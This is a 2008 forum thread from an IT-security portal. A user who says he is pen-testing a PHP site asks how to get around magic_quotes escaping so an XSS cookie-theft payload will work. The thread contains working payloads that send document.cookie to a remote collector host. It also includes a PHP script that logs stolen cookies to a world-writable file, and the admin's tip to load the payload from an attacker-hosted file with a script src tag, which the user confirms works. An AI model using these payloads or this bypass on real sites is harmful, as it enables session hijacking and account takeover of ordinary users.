|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 82
Members: 0
Total: 82
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XSS Filter Perhaps? |
|
Posted: Sat Oct 18, 2008 9:35 pm |
|
|
shadow81 |
Regular user |
|
|
Joined: Aug 28, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
I have been carrying out pen-test work for a local website, and acunetix revealed xss flaws with the scripting.
Website is written in php/mysql.
I can run the code
Code: |
<script>alert(document.cookie)</script>
|
correctly, cookie info pops up in an alert.
however, when I run a more malicious code:
Code: |
<script%20%0a%0d>document.location%3D%0D%0A'http://www.remote-server-address.com/cookie.php?cookie%3D%0D%0A'+document.cookie</script>
|
It will not write cookies. Viewing the webpage's source code after js injection reveals that it converts the above code into:
Code: |
<script>document.location=\'http://www.remote-server-address.com/cookie.php?cookie=\' document.cookie</script>
|
So it breaks the code up with "\" and removes the "+".
Is there a way to prevent this happening and successfully carry out cookie theft?
Also, does this script need to be in the HEAD of the document? As the vulnerabilities insert it into the BODY of the page.
Any help would be greatly appreciated. |
|
|
|
|
|
|
|
|
Posted: Sat Oct 18, 2008 10:02 pm |
|
|
shadow81 |
Regular user |
|
|
Joined: Aug 28, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
Just for the record, the cookie.php code:
Code: |
<?php
$handle=fopen("cookie.txt","a");
fputs($handle,"\n".$_GET["cookie"]."\n");
fclose($handle);
?>
|
it is in a folder which is CHMOD 777
cookie.txt is 777
cookie.php is 755 |
|
|
|
|
Posted: Sun Oct 19, 2008 12:03 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This is php's "magic_quotes" in action
Best way to exploit XSS is via use of "src":
Code: |
<script src=http://www.attacker.com/js.txt></script>
|
No need for single- or double quotes and it's easy to use bigger javascript payloads |
|
|
|
|
Posted: Sun Oct 19, 2008 1:22 am |
|
|
shadow81 |
Regular user |
|
|
Joined: Aug 28, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
Code: | document.location=http://www.remote-host.com/cookie.php?cookie=+document.cookie'; |
So save that as cookie.js and that should work or do I not even need the ; at the end? |
|
|
|
|
Posted: Sun Oct 19, 2008 1:46 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Yes, you need to prepare text file like this:
Code: |
document.location='http://www.remote-host.com/cookie.php?cookie='+document.cookie;
|
Upload this text file to the server under your control. |
|
|
|
|
Posted: Sun Oct 19, 2008 2:05 am |
|
|
shadow81 |
Regular user |
|
|
Joined: Aug 28, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
Thank you for your help waraxe, it works great. I appreciate it.
Now I have the fun task of preparing the report lol |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|